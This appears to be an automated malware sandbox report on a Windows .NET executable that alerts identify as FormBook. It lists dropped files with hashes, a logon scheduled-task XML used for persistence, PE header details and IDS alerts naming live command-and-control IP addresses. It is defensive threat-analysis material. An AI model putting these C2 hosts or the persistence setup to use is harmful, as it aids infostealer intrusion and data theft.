Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zE1VxVoZ3W.exe.log

Download File

Process:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\62MfV68M

Download File

Process:	C:\Windows\SysWOW64\winver.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xl0hwyu.f3c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyx5xts.j0y.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epniggks.0in.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjsredis.24b.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4fzlmvq.4ri.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pskss2jq.fma.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tehc42ap.mra.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtt0uvyv.ulu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp7D49.tmp

Download File

Process:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.114681014826861
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtbxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTFv
MD5:	CA0F6D70EF737F343CE413D48460F475
SHA1:	6E5AF5B8667C35D7ECFDA019F0DA6CA7655B14C2
SHA-256:	0F1E1645BDB5A80E07865943A5448F70F5BE4921BBF2DF46BBCE527CE8EABFBB
SHA-512:	90B647503367DBD16B6BB2B1556F2DE543D96268216CBD2C7F9B4E957AEA22C18A68D1C0DE064E5DB7E7585391A7D57AC7C9AB729818953EE4EB35479C7ACF09
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp99F9.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1587
Entropy (8bit):	5.114681014826861
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtbxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTFv
MD5:	CA0F6D70EF737F343CE413D48460F475
SHA1:	6E5AF5B8667C35D7ECFDA019F0DA6CA7655B14C2
SHA-256:	0F1E1645BDB5A80E07865943A5448F70F5BE4921BBF2DF46BBCE527CE8EABFBB
SHA-512:	90B647503367DBD16B6BB2B1556F2DE543D96268216CBD2C7F9B4E957AEA22C18A68D1C0DE064E5DB7E7585391A7D57AC7C9AB729818953EE4EB35479C7ACF09
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe

Download File

Process:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1010176
Entropy (8bit):	6.948214543170522
Encrypted:	false
SSDEEP:	12288:1xS9eNv40B/j+e51CV+K3kVg4j8K8sW8ydKOZ1au+N0od3JmUm1r:1xS94vLS+1Q+JVRz8X80KOZEHyUmt
MD5:	3AF13FB92C445D73E1CE763D1400D39C
SHA1:	CF6BD2BE897EB2C40308543F2409F0D26DD84D58
SHA-256:	2BD00E0D7CB7E741F8736EDE2F6B354C7190E983BC38CA8326F8135B81256055
SHA-512:	6D34FBE1E9AEE25FCD2DA89533B0308C585452E67A0CA01DAC297F65C50753415E0D4DC7B4CED12644268F4CBA0C0AE420B54C8547C5E2BB7D2CD9DA2A40E9BA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`............... ........@.. ....................................@..................................~..O...................................\|f..p............................................ ............... ..H............text...$_... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................~......H............R......J...................................................0............}......}.....(.......(......{...........%.r...p(....s.....%.r...p(....s.....%.r%..p(....s.......o.......(...+....-....o....&..0...........s2.....o.......0...........sA.....o.......0...........s/.....o.......0...........s8.....o.......0...........s;.....o.......0...........s>.....o.......0...........s5.....o.......0...........sD.....o.......0...........sG.....o.......0...........s .

C:\Users\user\AppData\Roaming\ydRhqlPsLsIczR.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\zE1VxVoZ3W.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.948214543170522
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	zE1VxVoZ3W.exe
File size:	1'010'176 bytes
MD5:	3af13fb92c445d73e1ce763d1400d39c
SHA1:	cf6bd2be897eb2c40308543f2409f0d26dd84d58
SHA256:	2bd00e0d7cb7e741f8736ede2f6b354c7190e983bc38ca8326f8135b81256055
SHA512:	6d34fbe1e9aee25fcd2da89533b0308c585452e67a0ca01dac297f65c50753415e0d4dc7b4ced12644268f4cba0c0ae420b54c8547c5e2bb7d2cd9da2a40e9ba
SSDEEP:	12288:1xS9eNv40B/j+e51CV+K3kVg4j8K8sW8ydKOZ1au+N0od3JmUm1r:1xS94vLS+1Q+JVRz8X80KOZEHyUmt
TLSH:	6725C53D097D12EB81A9C79DCBE89827F614A86FB150ACA494C647A53357F4B34C323E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..`............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4f7f1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA1BE0117 [Tue Dec 28 05:18:15 2055 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf7ec9	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf8000	0x5c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf667c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf5f24	0xf6000	faae16b75e6719704f68ca01e43deaa9	False	0.6964548002413617	data	6.953841026361057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf8000	0x5c4	0x600	9cd15bc0fd0bf7fff5f071f31643a2c5	False	0.4303385416666667	data	4.13142662836804	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfa000	0xc	0x200	1c6b3ecb547807a325cbea6fbd74413e	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xf8090	0x334	data			0.43902439024390244
RT_MANIFEST	0xf83d4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:40:50.253492+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49713	188.114.96.3	80	TCP
2025-01-10T16:40:55.825374+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49941	84.32.84.32	80	TCP
2025-01-10T16:40:59.425754+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49957	84.32.84.32	80	TCP
2025-01-10T16:41:00.941931+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49967	84.32.84.32	80	TCP
2025-01-10T16:41:03.601910+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49981	84.32.84.32	80	TCP
2025-01-10T16:41:10.316701+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49984	3.33.130.190	80	TCP
2025-01-10T16:41:11.817068+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49985	3.33.130.190	80	TCP
2025-01-10T16:41:14.344989+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49986	3.33.130.190	80	TCP
2025-01-10T16:41:22.935788+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49987	3.33.130.190	80	TCP
2025-01-10T16:41:28.635546+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49988	91.195.240.123	80	TCP
2025-01-10T16:41:31.181715+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49989	91.195.240.123	80	TCP
2025-01-10T16:41:33.724496+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49990	91.195.240.123	80	TCP
2025-01-10T16:41:36.710771+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49991	91.195.240.123	80	TCP
2025-01-10T16:41:42.736924+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49992	38.181.21.54	80	TCP
2025-01-10T16:41:45.335087+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49993	38.181.21.54	80	TCP
2025-01-10T16:41:48.090904+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49994	38.181.21.54	80	TCP
2025-01-10T16:41:50.400334+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49995	38.181.21.54	80	TCP
2025-01-10T16:41:56.380120+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49996	78.141.202.204	80	TCP
2025-01-10T16:41:58.955635+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49997	78.141.202.204	80	TCP
2025-01-10T16:42:01.514553+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49998	78.141.202.204	80	TCP
2025-01-10T16:42:04.040733+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	49999	78.141.202.204	80	TCP
2025-01-10T16:42:10.047041+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50000	156.253.8.115	80	TCP
2025-01-10T16:42:12.602254+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50001	156.253.8.115	80	TCP
